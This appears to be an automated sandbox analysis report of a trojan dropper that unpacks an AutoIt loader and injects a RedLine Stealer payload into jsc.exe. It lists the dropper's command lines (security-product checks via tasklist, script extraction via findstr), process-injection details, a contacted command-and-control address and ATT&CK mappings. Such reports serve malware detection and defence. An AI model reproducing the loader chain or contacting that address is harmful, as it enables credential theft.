Source: Rarissima.exe.pif, 0000000A.00000003.1749444084.0000000001194000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG = $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG + 1\|
Source: Inclina.tmp.0.dr	Binary or memory string: $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG = 0
Source: Rarissima.exe.pif, 0000000A.00000003.1750905001.0000000003BD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: YGTDOXIGXJVYDEAERPCBPFWHZSAXZBDNCPPGWWQZKQNYOAYGZZVVMCIMJG
Source: Rarissima.exe.pif, 0000000A.00000003.1750480379.0000000003DD6000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000002.1758914723.0000000003DD6000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1749762496.0000000003DC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

API call chain: ExitProcess graph end node

graph_10-97724

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009C45D5 BlockInput,

10_2_009C45D5

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_00965240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00965240

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_00985CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

10_2_00985CAC

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: 0_2_004067E3 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetWindow,

0_2_004067E3

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009A88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

10_2_009A88CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_00414365 SetUnhandledExceptionFilter,	0_2_00414365
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Code function: 0_2_004145D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004145D4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0097A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0097A385
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0097A354 SetUnhandledExceptionFilter,	10_2_0097A354

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: BE0000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: BE0000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: DC7000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009A9369 LogonUserW,

10_2_009A9369

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_00965240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00965240

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009B1AC6 SendInput,keybd_event,

10_2_009B1AC6

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009B51E2 mouse_event,

10_2_009B51E2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Bel.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq BullGuardCore.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I /N "bullguardcore.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq PSUAService.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I /N "psuaservice.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif Rarissima.exe.pif u	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\waitfor.exe waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

10_2_009A88CD

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009B4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

10_2_009B4F1C

Source: Rarissima.exe.pif, 0000000A.00000000.1174665285.0000000000A06000.00000002.00000001.01000000.00000006.sdmp, Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Rarissima.exe.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: 0_2_0040D280 cpuid

0_2_0040D280

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_0040275A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: 0_2_00404AEB ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetLocalTime,GetFileAttributesW,LoadLibraryW,GetComputerNameW,wcscmp,wcscmp,wcscmp,wcscmp,wcscmp,wcscmp,wcscmp,GetModuleHandleW,GetModuleHandleW,GetLastError,GetModuleHandleW,GetProcAddress,MessageBoxTimeoutW,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitializeEx,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_00404AEB

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_00990722 GetUserNameW,

10_2_00990722

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_0098416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

10_2_0098416A

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_00965D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_00965D13

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rarissima.exe.pif PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 7576, type: MEMORYSTR

Source: Rarissima.exe.pif	Binary or memory string: WIN_81
Source: Rarissima.exe.pif	Binary or memory string: WIN_XP
Source: Rarissima.exe.pif	Binary or memory string: WIN_XPe
Source: Rarissima.exe.pif	Binary or memory string: WIN_VISTA
Source: Rarissima.exe.pif	Binary or memory string: WIN_7
Source: Rarissima.exe.pif	Binary or memory string: WIN_8
Source: Rarissima.exe.pif.4.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rarissima.exe.pif PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 7576, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009C696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		10_2_009C696E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009C6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		10_2_009C6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	11 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	121 Input Capture	12 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	2 Valid Accounts	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	121 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	37 System Information Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	11 DLL Side-Loading	LSA Secrets	31 Security Software Discovery	SSH	Keylogging	11 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	71%	Virustotal		Browse
SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	58%	ReversingLabs	Win32.Trojan.Generic
SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	100%	Avira	HEUR/AGEN.1307022

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dici.tmp	100%	Avira	DR/FakePic.Gen
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
45.67.231.189:49441	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xCYuqFZpbOjjkUqkfthcb.xCYuqFZpbOjjkUqkfthcb	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.67.231.189:49441	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://tempuri.org/Entity/Id10Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id24LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id8Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyx	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id16(	jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id22LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id20LR	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id12Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/envelope/	jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id2Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/Entity/Id21Response	jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.autoitscript.com/autoit3/	Dici.tmp.0.dr, Rarissima.exe.pif.4.dr	false	high
